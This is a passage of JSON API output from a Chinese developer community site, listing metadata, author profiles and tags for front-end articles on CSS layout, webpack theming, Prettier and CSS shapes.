"is_hot": 0, "rank_index": 0.00057287, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1855631356860685", "user_name": "西南_张家辉", "company": "才华有限分公司", "job_title": "切图仔", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/a9729684b3af2c2014a6c34ecaeb2a57~300x300.image", "level": 3, "description": "感谢你这么有才华还关注我", "followee_count": 41, "follower_count": 1413, "post_article_count": 105, "digg_article_count": 207, "got_digg_count": 2478, "got_view_count": 249881, "post_shortmsg_count": 41, "digg_shortmsg_count": 206, "isfollowed": false, "favorable_author": 0, "power": 4980, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6844904202922098701, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903603136806919", "article_info": {"article_id": "6844903603136806919", "user_id": "1081575169076430", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640394175971342], "visible_level": 0, "link_url": "https://www.w3ctrain.com/2017/07/01/effective-work/", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2018/5/8/1633d680ac546f7c~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "提高你的开发效率啊,切图仔", "brief_content": "工作到今天正好一年,待过两家公司,做过面向用户的前端,也做过管理系统的前端,现在主要的还是移动端的活动页。每天都在写业务相关的代码,怕久而久之…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 1, "original_author": "", "content": "", "ctime": "1525743619", "mtime": "1599468938", "rtime": "1525743619", "draft_id": "0", "view_count": 5288, "collect_count": 31, "digg_count": 88, "comment_count": 17, "hot_index": 369, "is_hot": 0, "rank_index": 0.00057224, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1081575169076430", "user_name": "FESKY", "company": "Tencent", "job_title": "前端开发工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/53de59875129f0f646158701c548a926~300x300.image", "level": 4, "description": "相信坚持的力量。", "followee_count": 27, "follower_count": 3546, "post_article_count": 65, "digg_article_count": 106, "got_digg_count": 7728, "got_view_count": 218021, "post_shortmsg_count": 0, "digg_shortmsg_count": 14, "isfollowed": false, "favorable_author": 1, "power": 9825, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6844903603136806919, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903634841370632", "article_info": {"article_id": "6844903634841370632", "user_id": "2330620379281559", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "「CSS思维」组件化VS原子化", "brief_content": "因为技术站的更新,我们公司 M 站的项目,开始往 React 迁移。然后在对于 React 中 CSS 的使用方式上,我和一个同事有了很大的分歧。 我是一个非常推崇原子化使用 CSS 的人。我喜欢使用类似: 这样的方式去使用 CSS 样式。和我角度不一样的同事可能会更倾向于组件…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1530952936", "mtime": "1626414102", "rtime": "1531106592", "draft_id": "6845075570791809032", "view_count": 5659, "collect_count": 26, "digg_count": 38, "comment_count": 25, "hot_index": 345, "is_hot": 0, "rank_index": 0.00057244, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2330620379281559", "user_name": "ziven27", "company": "27", "job_title": "爱折腾“设计”的前端", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/pABECVDM5b4p2QhCLAnIFuB~tplv-t2oaga2asx-image.image", "level": 3, "description": "爱跳舞的程序员", "followee_count": 106, "follower_count": 4285, "post_article_count": 42, "digg_article_count": 670, "got_digg_count": 1897, "got_view_count": 80194, "post_shortmsg_count": 45, "digg_shortmsg_count": 232, "isfollowed": false, "favorable_author": 0, "power": 2532, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6844903634841370632, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6953999190791815198", "article_info": {"article_id": "6953999190791815198", "user_id": "2524134427077287", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "前端工程师进阶要点二——更多的使用CSS|小册免费学", "brief_content": "CSS负责定义元素如何展现,页面上所有元素的样式不管是依赖业务需求还是静态的,都要尽可能的交由CSS来完成。此外CSS自定义属性、Scss等也可以帮助更好的实现css效果", "is_english": 0, "is_original": 1, "user_index": 3.043304126205342, "original_type": 0, "original_author": "", "content": "", "ctime": "1619104779", "mtime": "1619149162", "rtime": "1619149162", "draft_id": "6953989805638156301", "view_count": 177, "collect_count": 2, "digg_count": 12, "comment_count": 0, "hot_index": 20, "is_hot": 0, "rank_index": 0.00057231, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2524134427077287", "user_name": "代码迷途", "company": "", "job_title": "", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/cd443c9821f518f95b47807a94aced02~300x300.image", "level": 3, "description": "读不在三更五鼓,功只怕一曝十寒。\n码字不易,转载请注明出处!!!", "followee_count": 112, "follower_count": 96, "post_article_count": 99, "digg_article_count": 1621, "got_digg_count": 2089, "got_view_count": 31745, "post_shortmsg_count": 34, "digg_shortmsg_count": 20, "isfollowed": false, "favorable_author": 0, "power": 2406, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6953999190791815198, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6961458258456346632", "article_info": {"article_id": "6961458258456346632", "user_id": "1953184231197982", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "十.CSS—网页布局(标准流、浮动流)", "brief_content": "本文介绍了CSS标准流的一些规则;并且深入浅出的介绍了浮动流相关的知识,并结合CSS权威指南,做了详尽的描述。", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1620847629", "mtime": "1620875821", "rtime": "1620875821", "draft_id": "6961409323838734366", "view_count": 251, "collect_count": 4, "digg_count": 7, "comment_count": 0, "hot_index": 19, "is_hot": 0, "rank_index": 0.00057225, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "1953184231197982", "user_name": "前端_阿珂", "company": "", "job_title": "前端工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/d569f52bde8b976244f37e00222f4d3e~300x300.image", "level": 2, "description": "没有最好,只有更好", "followee_count": 32, "follower_count": 83, "post_article_count": 35, "digg_article_count": 56, "got_digg_count": 157, "got_view_count": 9967, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 256, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}], "user_interact": {"id": 6961458258456346632, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903596992135182", "article_info": {"article_id": "6844903596992135182", "user_id": "3896324936992605", "category_id": "6809637767543259144", "tag_ids": [6809640528267706382, 6809640394175971342, 6809640407484334093, 6809640398105870343], "visible_level": 0, "link_url": "https://blog.hypers.io/2018/04/19/webpack-mutiple-theme-solution/", "cover_image": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2018/4/23/162ee2478e0c9991~tplv-t2oaga2asx-image.image", "is_gfw": 0, "title": "webpack 换肤功能多主题/配色样式打包解决方案", "brief_content": "本文主要详细介绍了,如何使用 webpack打包多套不同主题的解决方案以及实践中所遇到的问题。", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 1, "original_author": "", "content": "", "ctime": "1524404350", "mtime": "1599466011", "rtime": "1524463062", "draft_id": "0", "view_count": 5870, "collect_count": 55, "digg_count": 73, "comment_count": 8, "hot_index": 374, "is_hot": 0, "rank_index": 0.00057102, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3896324936992605", "user_name": "hiyangguo", "company": "hypers", "job_title": "前端工程师", "avatar_large": "https://sf6-ttcdn-tos.pstatp.com/img/user-avatar/9a6d96d9e43c0fe130e42612981ec066~300x300.image", "level": 2, "description": "你若安好、便是晴天", "followee_count": 44, "follower_count": 1228, "post_article_count": 6, "digg_article_count": 215, "got_digg_count": 225, "got_view_count": 10591, "post_shortmsg_count": 3, "digg_shortmsg_count": 37, "isfollowed": false, "favorable_author": 0, "power": 351, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546614, "tag_id": "6809640528267706382", "tag_name": "Webpack", "color": "#6F94DB", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/73e856b07f83b4231c1e.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1440920866, "mtime": 1631692726, "id_type": 9, "tag_alias": "", "post_article_count": 6704, "concern_user_count": 204077}, {"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546519, "tag_id": "6809640398105870343", "tag_name": "JavaScript", "color": "#616161", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/5d70fd6af940df373834.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1435884803, "mtime": 1631692583, "id_type": 9, "tag_alias": "", "post_article_count": 67405, "concern_user_count": 398956}], "user_interact": {"id": 6844903596992135182, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903623399309326", "article_info": {"article_id": "6844903623399309326", "user_id": "3562073404224301", "category_id": "6809637767543259144", "tag_ids": [6809640407484334093, 6809640394175971342], "visible_level": 0, "link_url": "https://zhuanlan.zhihu.com/p/37478644", "cover_image": "", "is_gfw": 0, "title": "让你的代码更Prettier!代码风格统一终极方案!", "brief_content": "很多团队还在为代码风格头疼。大到采用哪套代码风格方案,小到tab和space之争,都是团队开发面临的选择。之前解决这种代码统一问题的方案是:EditorConfig,或者ESLint。 这篇文章介绍Prettier。写这篇文章前我搜了一下知乎,发现竟然还没有人普及Prettie…", "is_english": 0, "is_original": 0, "user_index": 0, "original_type": 1, "original_author": "", "content": "", "ctime": "1529564740", "mtime": "1599529798", "rtime": "1529564740", "draft_id": "0", "view_count": 4298, "collect_count": 45, "digg_count": 120, "comment_count": 17, "hot_index": 351, "is_hot": 0, "rank_index": 0.00057097, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3562073404224301", "user_name": "已禁用", "company": "", "job_title": "", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/1/7/168241351ef02be9~tplv-t2oaga2asx-image.image", "level": 3, "description": "我在这里挖掘最优质的互联网技术", "followee_count": 145, "follower_count": 15014, "post_article_count": 393, "digg_article_count": 1136, "got_digg_count": 21200, "got_view_count": 771736, "post_shortmsg_count": 250, "digg_shortmsg_count": 355, "isfollowed": false, "favorable_author": 0, "power": 2440, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}, {"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6844903623399309326, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6917985820787867662", "article_info": {"article_id": "6917985820787867662", "user_id": "2638482189065374", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "七日打卡-如何用绝对定位(position:absolute)完美定位布局及其注意事项", "brief_content": "此片博文主要讲解如何应用绝对定位实现完美布局,及应用注意事项。 在布局的过程中我们经常用到绝对定位,很多初学者在一开始用绝对定位经常会达不到预期的效果,因为它们往往会忽略使用绝对定位的两个条件。 当然要啦!代码又没有脑子,没法自己思考应该定位到哪里。为了使用的时候方便,使用绝对…", "is_english": 0, "is_original": 1, "user_index": 5.552368757722864, "original_type": 0, "original_author": "", "content": "", "ctime": "1610719198", "mtime": "1610780771", "rtime": "1610780771", "draft_id": "6917985183622774797", "view_count": 417, "collect_count": 12, "digg_count": 11, "comment_count": 8, "hot_index": 39, "is_hot": 0, "rank_index": 0.00057058, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "2638482189065374", "user_name": "行癫", "company": "中银金融科技有限公司", "job_title": "软件工程师", "avatar_large": "https://sf3-ttcdn-tos.pstatp.com/img/user-avatar/5e1c74534f130884dc3a2dd67d2afda5~300x300.image", "level": 2, "description": "No Sliver Bullet", "followee_count": 10, "follower_count": 18, "post_article_count": 7, "digg_article_count": 70, "got_digg_count": 88, "got_view_count": 4779, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 135, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6917985820787867662, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6972916275874332685", "article_info": {"article_id": "6972916275874332685", "user_id": "3642022780996718", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342, 6809640407484334093], "visible_level": 0, "link_url": "", "cover_image": "", "is_gfw": 0, "title": "「HTML+CSS」--自定义加载动画【023】", "brief_content": "这是我参与更文挑战的第1天,活动详情查看: 更文挑战 前言 效果展示 思路 Demo代码 HTML CSS 原理详解 步骤1 设置span标签 宽度、高度均为96px 效果图如下 span此时是没有显", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1623508630", "mtime": "1623555466", "rtime": "1623555466", "draft_id": "6972915199347015710", "view_count": 260, "collect_count": 0, "digg_count": 1, "comment_count": 0, "hot_index": 13, "is_hot": 0, "rank_index": 0.00056949, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "3642022780996718", "user_name": "海轰Pro", "company": "", "job_title": "", "avatar_large": "https://sf1-ttcdn-tos.pstatp.com/img/user-avatar/3c5d3c1b884787c4056e9248216ca409~300x300.image", "level": 2, "description": "学生|C++选手", "followee_count": 4, "follower_count": 8, "post_article_count": 87, "digg_article_count": 8, "got_digg_count": 121, "got_view_count": 8858, "post_shortmsg_count": 0, "digg_shortmsg_count": 0, "isfollowed": false, "favorable_author": 0, "power": 209, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}, {"id": 2546526, "tag_id": "6809640407484334093", "tag_name": "前端", "color": "#60ADFF", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/bac28828a49181c34110.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 1, "ctime": 1435971546, "mtime": 1631692835, "id_type": 9, "tag_alias": "", "post_article_count": 88828, "concern_user_count": 527704}], "user_interact": {"id": 6972916275874332685, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, {"article_id": "6844903809064386567", "article_info": {"article_id": "6844903809064386567", "user_id": "43636194548711", "category_id": "6809637767543259144", "tag_ids": [6809640394175971342], "visible_level": 0, "link_url": "https://juejin.im/post/6844903809064386567", "cover_image": "", "is_gfw": 0, "title": "CSS 绘制各种形状", "brief_content": "使用 CSS 可以绘制出许多形状,比如三角形、梯形、圆形、椭圆,等 并不只是可以绘制矩形。下面来看看怎么实现这些形状的吧。 为了容易理解,文章分为基本形状 和 组合形状来说,基本形状是比较容易实现的,而利用这些基本形状进行组合,就可以实现稍微复杂点的组合形状了。 心形是由两个圆…", "is_english": 0, "is_original": 1, "user_index": 0, "original_type": 0, "original_author": "", "content": "", "ctime": "1553776157", "mtime": "1598771771", "rtime": "1554010627", "draft_id": "6845076229092016135", "view_count": 3511, "collect_count": 104, "digg_count": 65, "comment_count": 5, "hot_index": 245, "is_hot": 0, "rank_index": 0.00056905, "status": 2, "verify_status": 1, "audit_status": 2, "mark_content": ""}, "author_user_info": {"user_id": "43636194548711", "user_name": "FEWY", "company": "", "job_title": "web前端工程师", "avatar_large": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/mirror-assets/168e08733c7ec1bcc79~tplv-t2oaga2asx-image.image", "level": 3, "description": "", "followee_count": 39, "follower_count": 239, "post_article_count": 24, "digg_article_count": 210, "got_digg_count": 1364, "got_view_count": 84934, "post_shortmsg_count": 2, "digg_shortmsg_count": 62, "isfollowed": false, "favorable_author": 0, "power": 2213, "study_point": 0, "university": {"university_id": "0", "name": "", "logo": ""}, "major": {"major_id": "0", "parent_id": "0", "name": ""}, "student_status": 0, "select_event_count": 0, "select_online_course_count": 0, "identity": 0, "is_select_annual": false, "select_annual_rank": 0, "annual_list_type": 0, "extraMap": {}, "is_logout": 0}, "category": {"category_id": "6809637767543259144", "category_name": "前端", "category_url": "frontend", "rank": 2, "back_ground": "https://lc-mhke0kuv.cn-n1.lcfile.com/8c95587526f346c0.png", "icon": "https://lc-mhke0kuv.cn-n1.lcfile.com/1c40f5eaba561e32.png", "ctime": 1457483942, "mtime": 1432503190, "show_type": 3, "item_type": 2, "promote_tag_cap": 4, "promote_priority": 2}, "tags": [{"id": 2546516, "tag_id": "6809640394175971342", "tag_name": "CSS", "color": "#244DE4", "icon": "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/leancloud-assets/66de0c4eb9d10130d5bf.png~tplv-t2oaga2asx-image.image", "back_ground": "", "show_navi": 0, "ctime": 1432239426, "mtime": 1631688735, "id_type": 9, "tag_alias": "", "post_article_count": 14981, "concern_user_count": 297034}], "user_interact": {"id": 6844903809064386567, "omitempty": 2, "user_id": 0, "is_digg": false, "is_follow": false, "is_collect": false}, "org": {"org_info": null, "org_user": null, "is_followed": false}, "req_id": "2021091516034201020405107116006995"}, 